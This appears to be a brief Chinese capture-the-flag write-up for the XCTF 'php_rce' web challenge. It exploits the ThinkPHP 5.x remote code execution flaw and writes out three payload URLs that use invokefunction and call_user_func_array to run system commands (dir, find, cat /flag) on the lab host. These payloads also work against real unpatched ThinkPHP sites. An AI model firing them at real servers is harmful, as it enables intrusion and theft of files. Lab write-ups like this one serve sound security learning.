攻防世界web高手进阶php_rce,php_rce 攻防世界xctf web
php_rce
首先了解ThinkPHP5.x rec 漏洞分析與復現https://blog.csdn.net/qq_40884727/article/details/101452478
var_pathinfo的默認配置為s,我們可以通過$_GET[‘s’]來傳參
于是構造payload
http://111.198.29.45:30600/index.php?s=index/\think\App/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir
DIR是DOS操作系統用來查看磁盤中文件的。命令dir有很多的參數,這是在windowsXP中的參數以及說明,也可能是Macromedia Director MX產生的文件。
查找flag文件
http://111.198.29.45:30600/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20%22flag%22
用cat函數讀取flag文件
http://111.198.29.45:30600/index.php?s=index/\think\App/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag
得到flag
點贊
收藏
分享
文章舉報
weixin_45689999
發布了20 篇原創文章 · 獲贊 0 · 訪問量 311
私信
關注
總結
以上是生活随笔為你收集整理的攻防世界web高手进阶php_rce,php_rce 攻防世界xctf web的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: php无法新数据类型,新手入门PHP必知
- 下一篇: ddos攻击原理与防御方法(ddos攻击